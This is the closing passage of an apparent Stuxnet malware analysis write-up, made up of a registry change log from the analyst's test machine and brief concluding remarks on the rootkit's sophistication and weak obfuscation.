 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\WinPos1280x720(1).left: 0x000000CB  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\WinPos1280x720(1).top: 0x00000034  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\WinPos1280x720(1).right: 0x000003EB  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\WinPos1280x720(1).bottom: 0x0000028C  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\Rev: 0x00000000  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\WFlags: 0x00000000  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\ShowCmd: 0x00000001  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\FFlags: 0x00000001  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\HotKey: 0x00000000  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\Buttons: 0xFFFFFFFF  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\Links: 0x00000000  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\Address: 0x00000000  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\Vid: "{65F125E5-7BE1-4810-BA9D-D271C8432CE3}"  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Documents and Settings\Owner\Desktop\MW\Lots of Stuxnet\snmw\malware.exe: "malware"  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\WinRAR\Interface\ShowPassword: 0x00000000  
 ----------------------------------  
 Values modified: 17  
 ----------------------------------  
 HKLM\SOFTWARE\Microsoft\Cryptography\RNG\Seed: 5B 70 29 6B 9F F8 6B 2E 27 BB 05 43 02 B3 42 43 88 7C 39 EA 7C 8F C3 C1 DA 61 6A 7A 3D A9 27 BB 06 12 F2 A2 B5 89 09 83 C9 CE 03 F8 7F 6C 1E 79 D9 10 7D F0 29 05 03 B9 29 88 8C EC E2 3C CB 04 12 E3 E3 EC 8F E6 27 0A 15 A9 09 6C 29 34 89 55  
 HKLM\SOFTWARE\Microsoft\Cryptography\RNG\Seed: 53 06 23 D9 FE 36 71 5D D7 02 23 98 92 D3 0C AA 52 45 17 A4 D9 2B 2E E6 C7 C1 12 FE D2 A0 E1 8A 5F CF 23 E0 9B 16 74 7E DC 38 BF 7E D6 F0 9F 97 9A 5B C8 12 7C C2 9E CE EF 95 DE D1 60 56 23 7A 21 96 9C 23 E4 CF D9 77 67 97 F4 EA F1 0D 25 18  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{5E6AB780-7743-11CF-A12B-00AA004AE837}\Count\HRZR_PGYFRFFVBA: 81 9C 54 0E 05 00 00 00  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{5E6AB780-7743-11CF-A12B-00AA004AE837}\Count\HRZR_PGYFRFFVBA: E3 F3 7F 0E 04 00 00 00  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU: 04 00 00 00 79 00 00 00 E0 8D E6 42 90 93 CA 01  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU: 04 00 00 00 77 00 00 00 A0 EC DC 76 81 FE CF 01  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHAPCY: 04 00 00 00 0B 00 00 00 00 54 07 85 81 FE CF 01  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHAPCY: 01 00 00 00 0B 00 00 00 60 F6 98 73 27 F4 CF 01  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_HVFPHG: 04 00 00 00 4C 00 00 00 F0 8C 4C 41 90 93 CA 01  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_HVFPHG: 04 00 00 00 4A 00 00 00 90 73 55 73 81 FE CF 01  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\Qbphzragf naq Frggvatf\Bjare\Qrfxgbc\FlfGbbyf\Nhgbehaf\nhgbehaf.rkr: 04 00 00 00 08 00 00 00 E0 8D E6 42 90 93 CA 01  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\Qbphzragf naq Frggvatf\Bjare\Qrfxgbc\FlfGbbyf\Nhgbehaf\nhgbehaf.rkr: 04 00 00 00 07 00 00 00 50 F6 45 98 7E FE CF 01  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\Shell\Bags\1\Desktop\ItemPos1280x720(1): 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 15 00 00 00 16 02 00 00 14 00 1F 60 40 F0 5F 64 81 50 1B 10 9F 08 00 AA 00 2F 95 4E 15 00 00 00 4E 00 00 00 5A 00 3A 00 D4 02 00 00 5E 45 49 46 20 00 4D 4F 5A 49 4C 4C 7E 31 2E 4C 4E 4B 00 00 3E 00 03 00 04 00 EF BE 5E 45 49 46 6C 45 D2 6B 14 00 00 00 4D 00 6F 00 7A 00 69 00 6C 00 6C 00 61 00 20 00 46 00 69 00 72 00 65 00 66 00 6F 00 78 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 15 00 00 00 CA 01 00 00 34 00 31 00 00 00 00 00 5E 45 65 50 10 00 6D 62 61 72 00 00 20 00 03 00 04 00 EF BE 5E 45 63 50 5F 45 8D 55 14 00 00 00 6D 00 62 00 61 00 72 00 00 00 14 00 60 00 00 00 CA 01 00 00 2E 00 31 00 00 00 00 00 6C 45 4F 6C 10 00 4D 57 00 00 1C 00 03 00 04 00 EF BE 6C 45 48 6C 6C 45 4F 6C 14 00 00 00 4D 00 57 00 00 00 12 00 60 00 00 00 E6 00 00 00 3C 00 31 00 00 00 00 00 6A 45 6B 21 10 00 6F 64 62 67 31 31 30 00 26 00 03 00 04 00 EF BE   
 6A 45 F4 1A 6C 45 59 6C 14 00 00 00 6F 00 64 00 62 00 67 00 31 00 31 00 30 00 00 00 16 00 AB 00 00 00 02 00 00 00 4C 00 31 00 00 00 00 00 6C 45 0F 6D 10 00 52 45 47 53 48 4F 7E 31 2E 30 00 00 32 00 03 00 04 00 EF BE 6C 45 0F 6D 6C 45 12 6D 14 00 00 00 52 00 65 00 67 00 73 00 68 00 6F 00 74 00 2D 00 31 00 2E 00 39 00 2E 00 30 00 00 00 1A 00 60 00 00 00 16 02 00 00 40 00 31 00 00 00 00 00 6C 45 D1 6E 10 00 53 79 73 54 6F 6F 6C 73 00 00 28 00 03 00 04 00 EF BE 6C 45 73 6C 6C 45 D1 6E 14 00 00 00 53 00 79 00 73 00 54 00 6F 00 6F 00 6C 00 73 00 00 00 18 00 15 00 00 00 02 00 00 00 3C 00 32 00 5F 38 1C 00 5E 45 EF 45 20 00 62 65 72 2E 72 61 72 00 26 00 03 00 04 00 EF BE 5E 45 EF 45 6C 45 AE 6B 14 00 00 00 62 00 65 00 72 00 2E 00 72 00 61 00 72 00 00 00 16 00 60 00 00 00 32 01 00 00 4E 00 32 00 78 ED 9C 00 5E 45 D0 51 20 00 48 49 54 4D 41 4E 7E 31 2E 45 58 45 00 00 32 00 03 00 04 00 EF BE 5E 45 C6 51 6A 45 87 28 14 00 00 00 48 00 69 00 74 00 6D 00 61 00 6E 00 50 00 72 00 6F 00 2E 00 65 00 78 0  
 0 65 00 00 00 1C 00 60 00 00 00 4E 00 00 00 5C 00 32 00 8B 02 00 00 6A 45 80 12 20 00 49 44 41 50 52 4F 7E 31 2E 4C 4E 4B 00 00 40 00 03 00 04 00 EF BE 6A 45 80 12 6A 45 E7 1A 14 00 00 00 49 00 44 00 41 00 20 00 50 00 72 00 6F 00 20 00 28 00 33 00 32 00 2D 00 62 00 69 00 74 00 29 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 60 00 00 00 9A 00 00 00 5C 00 32 00 97 02 00 00 6A 45 80 12 20 00 49 44 41 50 52 4F 7E 32 2E 4C 4E 4B 00 00 40 00 03 00 04 00 EF BE 6A 45 80 12 6A 45 F3 1E 14 00 00 00 49 00 44 00 41 00 20 00 50 00 72 00 6F 00 20 00 28 00 36 00 34 00 2D 00 62 00 69 00 74 00 29 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 60 00 00 00 02 00 00 00 52 00 32 00 CE 02 00 00 5E 45 74 83 20 00 4F 53 46 4F 52 45 7E 31 2E 4C 4E 4B 00 00 36 00 03 00 04 00 EF BE 5E 45 74 83 6A 45 12 59 14 00 00 00 4F 00 53 00 46 00 6F 00 72 00 65 00 6E 00 73 00 69 00 63 00 73 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 15 00 00 00 9A 00 00 00 66 00 32 00 97 01 00 00 5E 45 ED 46 20 00 53 48 4F 52 54 43 7E 31 2E 4C 4E 4B 00 00 4A  
  00 03 00 04 00 EF BE 5E 45 ED 46 6C 45 75 6C 14 00 00 00 53 00 68 00 6F 00 72 00 74 00 63 00 75 00 74 00 20 00 74 00 6F 00 20 00 44 00 6F 00 77 00 6E 00 6C 00 6F 00 61 00 64 00 73 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 15 00 00 00 E6 00 00 00 62 00 32 00 8A 02 00 00 5E 45 58 47 20 00 53 48 4F 52 54 43 7E 32 2E 4C 4E 4B 00 00 46 00 03 00 04 00 EF BE 5E 45 58 47 6C 45 E5 6C 14 00 00 00 53 00 68 00 6F 00 72 00 74 00 63 00 75 00 74 00 20 00 74 00 6F 00 20 00 66 00 69 00 72 00 65 00 66 00 6F 00 78 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 15 00 00 00 32 01 00 00 60 00 32 00 DF 02 00 00 5E 45 A8 48 20 00 53 48 4F 52 54 43 7E 33 2E 4C 4E 4B 00 00 44 00 03 00 04 00 EF BE 5E 45 A8 48 6C 45 5A 6C 14 00 00 00 53 00 68 00 6F 00 72 00 74 00 63 00 75 00 74 00 20 00 74 00 6F 00 20 00 77 00 69 00 6E 00 64 00 62 00 67 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 60 00 00 00 7E 01 00 00 50 00 32 00 F1 85 3F 00 5F 45 09 56 20 00 54 44 53 53 4B 49 7E 31 2E 5A 49 50 00 00 34 00 03 00 04 00 EF BE 5F 45 09 56 6C 45   
 75 6C 14 00 00 00 74 00 64 00 73 00 73 00 6B 00 69 00 6C 00 6C 00 65 00 72 00 2E 00 7A 00 69 00 70 00 00 00 1C 00 15 00 00 00 7E 01 00 00 4C 00 32 00 00 CE 05 00 5E 45 3B 50 20 00 74 67 32 69 6A 6E 6A 69 2E 65 78 65 00 00 30 00 03 00 04 00 EF BE 5E 45 3A 50 5E 45 35 83 14 00 00 00 74 00 67 00 32 00 69 00 6A 00 6E 00 6A 00 69 00 2E 00 65 00 78 00 65 00 00 00 1C 00 15 00 00 00 7E 01 00 00 00 00 00 00  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\Shell\Bags\1\Desktop\ItemPos1280x720(1): 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 15 00 00 00 16 02 00 00 14 00 1F 60 40 F0 5F 64 81 50 1B 10 9F 08 00 AA 00 2F 95 4E 15 00 00 00 4E 00 00 00 5A 00 3A 00 D4 02 00 00 5E 45 49 46 20 00 4D 4F 5A 49 4C 4C 7E 31 2E 4C 4E 4B 00 00 3E 00 03 00 04 00 EF BE 5E 45 49 46 6C 45 D2 6B 14 00 00 00 4D 00 6F 00 7A 00 69 00 6C 00 6C 00 61 00 20 00 46 00 69 00 72 00 65 00 66 00 6F 00 78 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 15 00 00 00 CA 01 00 00 34 00 31 00 00 00 00 00 5E 45 65 50 10 00 6D 62 61 72 00 00 20 00 03 00 04 00 EF BE 5E 45 63 50 5F 45 8D 55 14 00 00 00 6D 00 62 00 61 00 72 00 00 00 14 00 60 00 00 00 CA 01 00 00 2E 00 31 00 00 00 00 00 6C 45 4F 6C 10 00 4D 57 00 00 1C 00 03 00 04 00 EF BE 6C 45 48 6C 6C 45 4F 6C 14 00 00 00 4D 00 57 00 00 00 12 00 60 00 00 00 E6 00 00 00 3C 00 31 00 00 00 00 00 6A 45 6B 21 10 00 6F 64 62 67 31 31 30 00 26 00 03 00 04 00 EF BE   
 6A 45 F4 1A 6C 45 59 6C 14 00 00 00 6F 00 64 00 62 00 67 00 31 00 31 00 30 00 00 00 16 00 60 00 00 00 16 02 00 00 40 00 31 00 00 00 00 00 6C 45 84 6C 10 00 53 79 73 54 6F 6F 6C 73 00 00 28 00 03 00 04 00 EF BE 6C 45 73 6C 6C 45 84 6C 14 00 00 00 53 00 79 00 73 00 54 00 6F 00 6F 00 6C 00 73 00 00 00 18 00 15 00 00 00 02 00 00 00 3C 00 32 00 5F 38 1C 00 5E 45 EF 45 20 00 62 65 72 2E 72 61 72 00 26 00 03 00 04 00 EF BE 5E 45 EF 45 6C 45 AE 6B 14 00 00 00 62 00 65 00 72 00 2E 00 72 00 61 00 72 00 00 00 16 00 60 00 00 00 32 01 00 00 4E 00 32 00 78 ED 9C 00 5E 45 D0 51 20 00 48 49 54 4D 41 4E 7E 31 2E 45 58 45 00 00 32 00 03 00 04 00 EF BE 5E 45 C6 51 6A 45 87 28 14 00 00 00 48 00 69 00 74 00 6D 00 61 00 6E 00 50 00 72 00 6F 00 2E 00 65 00 78 00 65 00 00 00 1C 00 60 00 00 00 4E 00 00 00 5C 00 32 00 8B 02 00 00 6A 45 80 12 20 00 49 44 41 50 52 4F 7E 31 2E 4C 4E 4B 00 00 40 00 03 00 04 00 EF BE 6A 45 80 12 6A 45 E7 1A 14 00 00 00 49 00 44 00 41 00 20 00 50 00 72 00 6F 00 20 00 28 00 33 00 32 0  
 0 2D 00 62 00 69 00 74 00 29 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 60 00 00 00 9A 00 00 00 5C 00 32 00 97 02 00 00 6A 45 80 12 20 00 49 44 41 50 52 4F 7E 32 2E 4C 4E 4B 00 00 40 00 03 00 04 00 EF BE 6A 45 80 12 6A 45 F3 1E 14 00 00 00 49 00 44 00 41 00 20 00 50 00 72 00 6F 00 20 00 28 00 36 00 34 00 2D 00 62 00 69 00 74 00 29 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 60 00 00 00 02 00 00 00 52 00 32 00 CE 02 00 00 5E 45 74 83 20 00 4F 53 46 4F 52 45 7E 31 2E 4C 4E 4B 00 00 36 00 03 00 04 00 EF BE 5E 45 74 83 6A 45 12 59 14 00 00 00 4F 00 53 00 46 00 6F 00 72 00 65 00 6E 00 73 00 69 00 63 00 73 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 15 00 00 00 9A 00 00 00 66 00 32 00 97 01 00 00 5E 45 ED 46 20 00 53 48 4F 52 54 43 7E 31 2E 4C 4E 4B 00 00 4A 00 03 00 04 00 EF BE 5E 45 ED 46 6C 45 75 6C 14 00 00 00 53 00 68 00 6F 00 72 00 74 00 63 00 75 00 74 00 20 00 74 00 6F 00 20 00 44 00 6F 00 77 00 6E 00 6C 00 6F 00 61 00 64 00 73 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 15 00 00 00 E6 00 00 00 62 00 32  
  00 8A 02 00 00 5E 45 58 47 20 00 53 48 4F 52 54 43 7E 32 2E 4C 4E 4B 00 00 46 00 03 00 04 00 EF BE 5E 45 58 47 6A 45 F3 1E 14 00 00 00 53 00 68 00 6F 00 72 00 74 00 63 00 75 00 74 00 20 00 74 00 6F 00 20 00 66 00 69 00 72 00 65 00 66 00 6F 00 78 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 15 00 00 00 32 01 00 00 60 00 32 00 DF 02 00 00 5E 45 A8 48 20 00 53 48 4F 52 54 43 7E 33 2E 4C 4E 4B 00 00 44 00 03 00 04 00 EF BE 5E 45 A8 48 6C 45 5A 6C 14 00 00 00 53 00 68 00 6F 00 72 00 74 00 63 00 75 00 74 00 20 00 74 00 6F 00 20 00 77 00 69 00 6E 00 64 00 62 00 67 00 2E 00 6C 00 6E 00 6B 00 00 00 1C 00 60 00 00 00 7E 01 00 00 50 00 32 00 F1 85 3F 00 5F 45 09 56 20 00 54 44 53 53 4B 49 7E 31 2E 5A 49 50 00 00 34 00 03 00 04 00 EF BE 5F 45 09 56 6C 45 75 6C 14 00 00 00 74 00 64 00 73 00 73 00 6B 00 69 00 6C 00 6C 00 65 00 72 00 2E 00 7A 00 69 00 70 00 00 00 1C 00 15 00 00 00 7E 01 00 00 4C 00 32 00 00 CE 05 00 5E 45 3B 50 20 00 74 67 32 69 6A 6E 6A 69 2E 65 78 65 00 00 30 00 03 00 04 00 EF BE 5E 45   
 3A 50 5E 45 35 83 14 00 00 00 74 00 67 00 32 00 69 00 6A 00 6E 00 6A 00 69 00 2E 00 65 00 78 00 65 00 00 00 1C 00 AB 00 00 00 02 00 00 00 4C 00 31 00 00 00 00 00 6C 45 0F 6D 10 00 52 45 47 53 48 4F 7E 31 2E 30 00 00 32 00 03 00 04 00 EF BE 6C 45 0F 6D 6C 45 12 6D 14 00 00 00 52 00 65 00 67 00 73 00 68 00 6F 00 74 00 2D 00 31 00 2E 00 39 00 2E 00 30 00 00 00 1A 00 AB 00 00 00 02 00 00 00 00 00 00 00  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\NodeSlots: 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\NodeSlots: 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02 02  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\MRUListEx: 07 00 00 00 06 00 00 00 08 00 00 00 02 00 00 00 01 00 00 00 05 00 00 00 04 00 00 00 03 00 00 00 00 00 00 00 FF FF FF FF  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\MRUListEx: 08 00 00 00 06 00 00 00 02 00 00 00 07 00 00 00 01 00 00 00 05 00 00 00 04 00 00 00 03 00 00 00 00 00 00 00 FF FF FF FF  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\6\0\MRUListEx: 00 00 00 00 FF FF FF FF  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\6\0\MRUListEx: FF FF FF FF  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\7\MRUListEx: 00 00 00 00 01 00 00 00 FF FF FF FF  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\7\MRUListEx: 01 00 00 00 00 00 00 00 FF FF FF FF  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\27\Shell\ItemPos1280x720(1): 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 02 00 00 00 4E 00 31 00 00 00 00 00 6C 45 23 70 10 00 4C 4F 54 53 4F 46 7E 31 00 00 36 00 03 00 04 00 EF BE 6C 45 3C 6C 6C 45 23 70 14 00 00 00 4C 00 6F 00 74 00 73 00 20 00 6F 00 66 00 20 00 53 00 74 00 75 00 78 00 6E 00 65 00 74 00 00 00 18 00 DC 00 00 00 02 00 00 00 34 00 31 00 00 00 00 00 6C 45 51 6C 10 00 54 44 4C 34 00 00 20 00 03 00 04 00 EF BE 6C 45 4F 6C 6C 45 51 6C 14 00 00 00 54 00 44 00 4C 00 34 00 00 00 14 00 DC 00 00 00 02 00 00 00 00 00 00 00  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\27\Shell\ItemPos1280x720(1): 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 02 00 00 00 4E 00 31 00 00 00 00 00 6C 45 E9 6C 10 00 4C 4F 54 53 4F 46 7E 31 00 00 36 00 03 00 04 00 EF BE 6C 45 3C 6C 6C 45 E9 6C 14 00 00 00 4C 00 6F 00 74 00 73 00 20 00 6F 00 66 00 20 00 53 00 74 00 75 00 78 00 6E 00 65 00 74 00 00 00 18 00 DC 00 00 00 02 00 00 00 34 00 31 00 00 00 00 00 6C 45 51 6C 10 00 54 44 4C 34 00 00 20 00 03 00 04 00 EF BE 6C 45 4F 6C 6C 45 51 6C 14 00 00 00 54 00 44 00 4C 00 34 00 00 00 14 00 DC 00 00 00 02 00 00 00 00 00 00 00  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\29\Shell\WinPos1280x720(1).left: 0x00000049  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\29\Shell\WinPos1280x720(1).left: 0x0000002C  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\29\Shell\WinPos1280x720(1).top: 0x00000057  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\29\Shell\WinPos1280x720(1).top: 0x0000003A  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\29\Shell\WinPos1280x720(1).right: 0x00000369  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\29\Shell\WinPos1280x720(1).right: 0x0000034C  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\29\Shell\WinPos1280x720(1).bottom: 0x000002AF  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\29\Shell\WinPos1280x720(1).bottom: 0x00000292  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\SessionInformation\ProgramCount: 0x00000002  
 HKU\S-1-5-21-515967899-1935655697-682003330-1003\SessionInformation\ProgramCount: 0x00000001  
 ----------------------------------  
 Total changes: 150  
 ----------------------------------  

23 deleted keys, 110 values deleted, 17 values modified. Total = 150 changes.

Overall, there's a lot to this rootkit. I didn't go into the MRxCls configuration file decryption, network changes/attack methods, other methods of zero-day flaws, etc but even so you can see that this is a pretty sophisticated piece of malware. However, as we now see, its biggest downfall was its complete lack of protection.

The only personal explanation I have for this is that the creator(s) were either rushed to get it done by 'x' timeframe, so they focused on main code more than obfuscation, or they just imagined it wouldn't ever escape its original intended environment, so they'd never have to worry about reverse engineering being an issue.

References

Stuxnet Under the Microscope.
Analyzing a Stuxnet Infection with the Sysinternals Tools.